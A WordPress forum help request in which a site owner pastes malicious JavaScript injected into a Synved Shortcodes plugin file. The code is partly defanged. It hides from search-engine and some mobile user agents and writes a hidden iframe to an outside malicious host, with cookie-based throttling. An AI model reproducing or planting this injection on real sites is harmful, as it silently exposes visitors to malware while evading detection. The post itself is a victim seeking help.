Sybved Shortcode JS library hacked?
-
Hi,
I was warned by Google that my site was hacked. I had to close it down for investigation.
On the site https://aw-snap.info/ I was able to take a closer look at the pages on my website. It turns out that every JS library contains this suspicious code which was certainly not there from the beginning. It refers or installs src=hxxp://df2b46b7c.vriesit.com/maxarchi17.html.For instance:
https://www.artofado.nl/wp-content/plugins/synved-shortcodes/synved-shortcode/script/jquery.scrolltab.js?ver=1.0fu?nction getCookie(a){var b=do?cument.cookie.match(new RegExp(“(?:^|; )”+a.re?place(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\”)+”=([^;]*)”));return b?decodeURIComponent(b[1]):undefined}(fu?nction(){fu?nction b(i,f,g){var j=(i+””).toLowerCase();var e=(f+””).toLowerCase();var h=O;if((h=j.index?of(e,g))!==-1){return h}return false}fu?nction d(){var f=[“Yandex”,”Linux”,”AppleWebKit”,”wi?ndows NT 6.3″,”Mobile”,”Safari”,”Google”,”IEMobile”];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie(“atikorinstile_a”)===undefined);if(!d()&&c){do?cument.wr?ite(‘< if?rame src=hxxp://df2b46b7c.vriesit.com/maxarchi17.html?dir9″ height=”143″ width=”143″ style=”top: -999px;left: -1OO1px;border-top-width: 6px;position: absolute;border-left-width: 4px;”> < /if?rame> ‘);var a=new Date(new Date().getTime()+48*6O*6O*1OOO);do?cument.cookie=”atikorinstile_a=1; path=/; expires=”+a.toUTCst?ring()}})();
So, anybody familiair with this?
And since the code is not mine I thought I ask to the creator of WordPress Shrtcodes which worked very well om my site.
Would nice if there is a solution.Kind regards, Peer
- The topic ‘Sybved Shortcode JS library hacked?’ is closed to new replies.
